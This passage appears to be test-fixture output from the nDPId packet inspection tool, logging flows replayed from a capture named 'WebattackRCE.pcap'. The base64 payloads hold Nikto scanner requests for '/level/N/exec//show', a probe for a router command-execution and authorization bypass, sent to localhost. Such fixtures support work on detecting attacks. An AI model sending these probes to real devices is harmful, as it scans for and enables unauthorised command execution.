{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277685,"pkt":"AAAAAAAAAAAAAAAACABFAADI1dZAAEAGZld\/AAABfwAAAcZuH5B\/K+zaVaEXFIAYAED+vAAAAQEICp1m\/tydZv7cR0VUIC9sZXZlbC83MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTcpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277687,"pkt":"AAAAAAAAAAAAAAAACABFAADIUq1AAEAG6YB\/AAABfwAAAcZwH5AONGunkxG0mYAYAED+vAAAAQEICp1m\/t+dZv7fR0VUIC9sZXZlbC83MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277689,"pkt":"AAAAAAAAAAAAAAAACABFAADIo8lAAEAGmGR\/AAABfwAAAcZyH5BwuZrK24oufIAYAED+vAAAAQEICp1m\/uGdZv7hR0VUIC9sZXZlbC83Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277691,"pkt":"AAAAAAAAAAAAAAAACABFAADIVsBAAEAG5W1\/AAABfwAAAcZ0H5BhJ2+x3S4KSIAYAED+vAAAAQEICp1m\/uOdZv7jR0VUIC9sZXZlbC83My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277693,"pkt":"AAAAAAAAAAAAAAAACABFAADIebZAAEAGwnd\/AAABfwAAAcZ2H5BNR0C8mP2KqIAYAED+vAAAAQEICp1m\/uWdZv7lR0VUIC9sZXZlbC83NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277695,"pkt":"AAAAAAAAAAAAAAAACABFAADIMBZAAEAGDBh\/AAABfwAAAcZ4H5ACzwkce7l1k4AYAED+vAAAAQEICp1m\/uadZv7mR0VUIC9sZXZlbC83NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277699,"pkt":"AAAAAAAAAAAAAAAACABFAADIwYhAAEAGeqV\/AAABfwAAAcZ6H5CkKPiYt3JQbIAYAED+vAAAAQEICp1m\/uudZv7rR0VUIC9sZXZlbC83Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjMpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277701,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/s1AAEAGPWB\/AAABfwAAAcZ8H5AcB8fbr66aJ4AYAED+vAAAAQEICp1m\/u2dZv7tR0VUIC9sZXZlbC83Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277702,"pkt":"AAAAAAAAAAAAAAAACABFAADIfWpAAEAGvsN\/AAABfwAAAcZ+H5A9kER6aVFtF4AYAED+vAAAAQEICp1m\/u6dZv7uR0VUIC9sZXZlbC83OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277703,"pkt":"AAAAAAAAAAAAAAAACABFAADIZuhAAEAG1UV\/AAABfwAAAcaAH5DHm1\/1JwgzKoAYAED+vAAAAQEICp1m\/u+dZv7vR0VUIC9sZXZlbC83OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277705,"pkt":"AAAAAAAAAAAAAAAACABFAADIi\/NAAEAGsDp\/AAABfwAAAcaCH5DTprLkQgBQzIAYAED+vAAAAQEICp1m\/vGdZv7xR0VUIC9sZXZlbC84MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": 